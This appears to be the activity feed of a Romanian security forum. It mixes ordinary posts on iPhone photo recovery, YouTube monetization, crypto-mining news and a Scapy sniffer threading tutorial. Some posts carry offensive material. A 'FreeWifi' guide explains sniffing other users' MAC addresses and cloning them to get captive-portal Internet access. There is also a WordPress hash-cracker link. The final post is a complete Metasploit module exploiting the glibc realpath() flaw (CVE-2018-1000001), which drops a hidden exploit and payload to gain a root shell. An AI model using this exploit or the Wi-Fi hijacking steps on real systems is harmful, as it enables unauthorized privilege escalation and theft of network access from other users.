Jump to content

All Activity

This stream auto-updates     

  1. Past hour
  2. ToXiMaN

    Iphone data recovery

    Salut @ Arbiter elegantiae Multumesc de raspuns, am cautat destul pe internet inainte sa scriu pe forum si am incercat cateva variante e.g. Dr Phone si altele, dar fara un rezultat favorabil. Versiune de iOS 11.4 Sterse ~1 luna si ceva.
  3. Today
  4. QuoVadis

    Iphone data recovery

    Depinde de - cat de importante sunt pozele - ce resurse ai la dispozitie (timp, cunostinte, chef, bani) - versiune iPhone si iOS - cand au fost sterse Poti cauta diferite keywords pe Google gen "recover iphone deleted photos", "restore deleted iphone photo", "iphone forensics recover deleted files", etc. pentru idei. Sunt si ceva apps (gen dr fone) dar sunt slabe si in general se bazeaza pe faptul ca nu si-a facut inca sync cu icloud-ul. Inainte sa dai bani pe apps care iti cer bani citeste reviews si fa research pe Google sa vezi daca ajuta ori ba.
  5. Nytro

    Modificari forum

    Update la 4.3.4, sa imi ziceti daca apar probleme.
  6. ToXiMaN

    Iphone data recovery

    Salutare, Stiti daca este posibila recuperarea pozelor de pe un iPhone, fara back-up in cloud sau local si au fost sterse si din Recently deleted? Multumesc!
  7. Yesterday
  8. Apple is worried about the battery drain from background cryptocurrency mining. [ Apple recently announced new restrictions on the use of cryptocurrencies on iPhones and iPads, a change first noticed by Apple Insider on Monday. "Apps may not mine for cryptocurrencies unless the processing is performed off device," Apple's app store guidelines for iOS now say. This requirement was absent from the same document just a few weeks ago. Apple's new policy is apparently motivated in part by concerns that cryptocurrency mining could drain the batteries of mobile devices. "Apps, including any third party advertisements displayed within them, may not run unrelated background processes, such as cryptocurrency mining," the policy states. Websites have been battling this issue for months: people submitting scammy ads to ad networks that hijack the user's CPU to mine cryptocurrency and send the profits back to the admaker. YouTube was briefly serving up these ads before Google noticed the problem and banned the ads. But Apple's new policy seems to go beyond obviously abusive cases of surreptitious cryptocurrency mining. The guidelines ban any on-device mining—even if users deliberately download an app whose explicit purpose is to mine for cryptocurrency. Devices running iOS are not likely to qualify as good mining hardware anyway. Bitcoin cryptocurrency mining has long been dominated by custom ASIC chips. Some other cryptocurrencies are designed to be ASIC-resistant, but even these are predominantly mined on high-end graphics cards with ample processing power and memory. An iPhone or iPad doesn't offer very much raw computing power per dollar, so it probably wouldn't make sense for someone to buy an iPhone or iPad to use as a mining device. Apple guidelines also now state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks." Apple's new policy takes effect at a time of growing concern over scammy behavior in the cryptocurrency world. Google and Facebook both banned cryptocurrency ads from their ad networks earlier this year. And the Securities and Exchange Commission has become increasingly aggressive about shutting down initial coin offerings that are fraudulent or otherwise break the law. Via arstechnica.com
  9. Free Wifi This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows. Preparation Make sure you do this step before you are stuck without Internet access: Install Python pip On Linux, install Python Developer package, a dependency for the netifaces package. Ubuntu $ sudo apt-get install python-dev Fedora $ sudo dnf install python-devel Note: For Centos, substitute dnf with yum Make a copy of this repository and install dependencies for the script: $ git clone https://github.com/kylemcdonald/FreeWifi $ cd FreeWifi && sudo pip install -r requirements.txt How to get additional time If you had free internet access but your time has run out, the first thing to try is open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop) Safari for iOS Safari for Mac Microsoft Edge An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again. Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address. Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime. How to get free access If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine. To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately: Available interfaces: en0 Interface: en0 SSID: nonoinflight Available gateways: en0 Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9 100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s] Total of 5 user(s): 27:35:96:a8:66:7f 6359 bytes 36:fe:83:9c:35:eb 9605 bytes 65:01:3c:cc:20:e8 17306 bytes 8c:6f:11:2c:f0:ee 20515 bytes 0a:4f:b2:b8:e8:56 71541 bytes If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available. Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network. How it works wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out. Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py. This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal. Source
  10. OKQL

    Detectie si recunoastere faciala

    @sergiu4995 https://github.com/kylemcdonald/FaceTracker edit: poti incerca Face Substitution Kyle McDonald References: https://www.auduno.com/clmtrackr/examples/facesubstitution.html https://github.com/kylemcdonald http://kylemcdonald.net/
  11. The IT security researchers at Qihoo 360 Total Security have discovered a new malware aiming at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer system of unsuspected users. Dubbed ClipboardWalletHijacker by researchers; the malware is targeting at Windows-based devices and is currently installed on over 300,000 devices. As indicated by its name the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet – In case the malware finds Bitcoin and Ethereum addresses it replaces them with the one used by cybercriminals behind the campaign. So far ClipboardWalletHijacker has stolen over 5 Bitcoin while its last activity was detected on June 12th, 2018, indicating that malware is still active and stealing funds. Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies. “We strongly recommend users to enable antivirus software while installing new applications”, said the company in their blog post. ClipboardWalletHijacker’s ability to replace wallet address by monitoring clipboard activity is not new, previously, CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash, etc. In March this year, researchers spotted ComboJack malware which is actively stealing cryptocurrency by modifying victims addresses. Moreover, Evrial and Coinbitclip trojan was also caught monitoring clipboard activities of their victims to steal funds by replacing their wallet addresses. If you are investing in cryptocurrency make sure your system is secure and funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust. In January this year, researchers warned Internet proxy users to watch out for Tor Proxy since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets. Via hackread.com
  12. Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer’s NIC. Below is a small example: from scapy.all import * interface = "eth0" def print_packet(packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) print("[*] Start sniffing...") sniff(iface=interface, filter="ip", prn=print_packet) print("[*] Stop sniffing") This little sniffer displays the source and the destination of all packets having an IP layer: $ sudo python3 sniff_main_thread.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let’s look at a new example: from scapy.all import * from threading import Thread from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet) def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer: $ sudo python3 sniff_thread_issue.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing ^CTraceback (most recent call last): File "sniff_thread_issue.py", line 25, in <module> sleep(100) KeyboardInterrupt During handling of the above exception, another exception occurred: Traceback (most recent call last): File "sniff_thread_issue.py", line 28, in <module> sniffer.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'> Traceback (most recent call last): File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown t.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals: As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let’s have a look at this next example: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface self.stop_sniffer = Event() def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really… $ sudo python3 sniff_thread_issue_2.py [*] Start sniffing... ^C[*] Stop sniffing [!] New Packet: 10.137.2.30 -> 10.137.2.1 One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose: However, even if this solution would work, the thread won’t release the resources it might hold: The sniff function uses a socket which is released just before exiting, after the sniffing loop: try: while sniff_sockets: // Sniffing loop except KeyboardInterrupt: pass if opened_socket is None: for s in sniff_sockets: s.close() return plist.PacketList(lst,"Sniffed") Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.daemon = True self.socket = None self.interface = interface self.stop_sniffer = Event() def run(self): self.socket = conf.L2listen( type=ETH_P_ALL, iface=self.interface, filter="ip" ) sniff( opened_socket=self.socket, prn=self.print_packet, stop_filter=self.should_stop_sniffer ) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join(2.0) if sniffer.isAlive(): sniffer.socket.close() Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread. Source
  13. radiomyx

    UPLAY

    Pe uplay este pana maine jocul gratuit For Honnor pentru cei interesati! Bafta la joc.
  14. Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak". Screenshot Teaser As the target of development Education Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking. Build from source had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource. Repository even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer Heavy Control We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities. Always from terminal None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing Penetration Tools List Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing Information Gathering Vulnerability Assessment Web Attack Exploitation Testing Privilege Escalation Password Attack Social Engineering Man In The Middle Attack Stress Testing Wireless Attack Maintaining Access Forensics Tools Reverse Engineering Malware Analysis Covering Track Download: https://dracos-linux.org/downloads.php Source
  15. target_

    NFC challenge

    deleted
  16. yoyois

    Monetizare pe youtube ?

    Daca ajungi sa fii monetizat. Te plateste pt orice vizualizare ee reclama, nu conteaza cu cate luni in urma ai postat. Te plateste in functie de tara in care e vazuta reclama si tipul de reclama. Daca ai vizualizari USA preturile reclamelor sunt la rata USA. Nu conteaza continutul, de unde uploadezi etc. Unele tari ca franta, USA, Canada mai au avantaje cu "Sponsor Youtube", "Youtube Red" etc. Ca sa prinzi avantajele astea trebuie sa ai cont din tara respectiva si sa ai adresa postala/Carte de identitate de acolo. In orice tara se plateste prost. Multe vizualizari sunt cu adblock. Nu e usor sa fii monetizat, se intampla sa fii demonetizat daca postezi chestii ciudate, inclusiv banat daca nu respecti copyright. Iti trebuie sute de mii de vizualizari ca sa faci ceva bani.
  17. ImiDucCuMandrieSteagul

    Ofer 2 HOF-uri in Microsoft.

    Am mai facut rost de unu, daca vrea cineva PM.
  18. dancezar

    Monetizare pe youtube ?

    E in functie de unde sunt afisate reclamele, nu conteaza unde este facut contul. CPM-ul depinde de publicul tinta care te vizioneaza.
  19. wpCrack v1.0 - version 1.0 Installation git clone https://github.com/MrSqar-Ye/wpCrack.git WordPress hash cracker Video Contact: Twitter : @MrSqar Send to my email Source
  20. Stiu ca youtube plateste mai prost creatorii de continut din Romania. Cum se decide asta ca nu stiu exact: daca faci videoclipuri in romana te plateste ca pentru Romania sau daca le faci in engleza te plateste ca fiind din USA si nu din Romania sau nu conteaza in ce limba le faci ei te baga la Romania fiindca locatia ta este din Romania ? Stiu ca Gaben era intrebat de mai multe ori despre monetizarea pe youtube si a zis in mai multe videoclipuri ca pe partea de Romania se plateste prost si nu se merita si de asta intreb, daca le facea in engleza era platit ca pentr USA sau tot ca pentru Romania fiindca locatia lui e in Romania ? Exista vreo metoda sa iti faci cont sa fie monetizat ca fiind din USA si nu din Romania ? Care ?/Cum anume ? Daca da, tu atunci cand urci videoclipurile nu iti depisteaza ip-ul si vad ca esti din Romania si automat te baga la monetizare ca pentru Romania ? Daca se plateste in functie de limba in care faci videoclipurile si nu in functie de locatie, dcaa nu le faci in nici o limba, sa zicem doar interjectii, fara cuvinte intr-o limba anume, pe ce tara te monetizeaza ? Cum anume se plateste: sa zicem ca urci zece videoclipuri care fac intr-o luna X vizualizari fiecare. Te plateste la sfarsitul lunii. Ok. Tu, intre timp, urci altele, te plateste si pentru astea nou urcate sau si pentru alea de luna trecuta daca in continuare fac vizualizari si alea ? Multumesc mult de tot !
  21. TheGepetto

    filelist invitatie cod

    le mai ai?
  22. Last week
  23. Am rezolvat problema, era ceva legat de bios, rog T/C.
  24. NetRipper - Added support for Chrome 67 (32 and 64 bits) https://github.com/NytroRST/NetRipper
  25. Sadiq

    Master server

    Am o vaga idee despre cam ce este dar... Eu am cerut un pret de la cineva care ma poate ajuta cu ce am spus in primul post.
  26. cikek

    Master server

    Pai e simplu ... dd if=/dev/zero of=/tmp/populare.txt count=1024 bs=1024
  27. ICEBREAKER101010

    Politehnica sau nu?

    Din punctul meu de vedere, chiar si Politehnica a inceput sa scoata prosti cu diploma pe banda rulanta.Sunt destui care au terminat Politehnica si daca-i intrebi ceva pe parte de retelistica(cel putin pe astia care au terminat telecomunicatiile) sunt praf si pulbere.Altfel cand vin sa se angajeze au pretentii de ditamai salariile pentru ca vezi domle ei sunt ingineri si au terminat Politehnica dar ei nu stiu nimic daca-i iei la intrebari.Numai ca e un trend sa termini Poli si sa vrei sa te angajezi director si cu salariul cat mai mare fara ca tu sa stii cu ce se mananca telecomunicatiile.
  28. Sadiq

    Master server

    Am nevoie de cineva sa imi faca un master server si sa ma ajute cu o solutie de populare. Astept un pret in PM si exact de ce am nevoie. Am un VPS de 8 GB RAM, 100 GB SSD si 4x Xeon. Am si web hosting pt platforma.
  29. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "glibc 'realpath()' Privilege Escalation", 'Description' => %q{ This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1. }, 'License' => MSF_LICENSE, 'Author' => [ 'halfdog', # Discovery and RationalLove.c exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Jan 16 2018', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'RationalLove.c' ], [ 'BID', '102525' ], [ 'CVE', '2018-1000001' ], [ 'EDB', '43775' ], [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ], [ 'URL', 'https://securitytracker.com/id/1040162' ], [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ], [ 'URL', 'https://usn.ubuntu.com/3534-1/' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -w -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end register_file_for_cleanup path cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36') vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' version = glibc_version if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26') vprint_error "GNU C Library version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "GNU C Library version #{version} is vulnerable" # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1 glibc_banner = cmd_exec('ldd --version') unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9') vprint_error 'No offsets for this version of GNU C Library' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" @executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile @executable_path, exploit_data('RationalLove.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx @executable_path, exploit_data('RationalLove') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30 output.each_line { |line| vprint_status line.chomp } end def on_new_session(client) # remove root owned SUID executable if client.type.eql? 'meterpreter' client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' client.fs.file.rm @executable_path else client.shell_command_token "rm #{@executable_path}" end end end Source
  1. Load more activity
×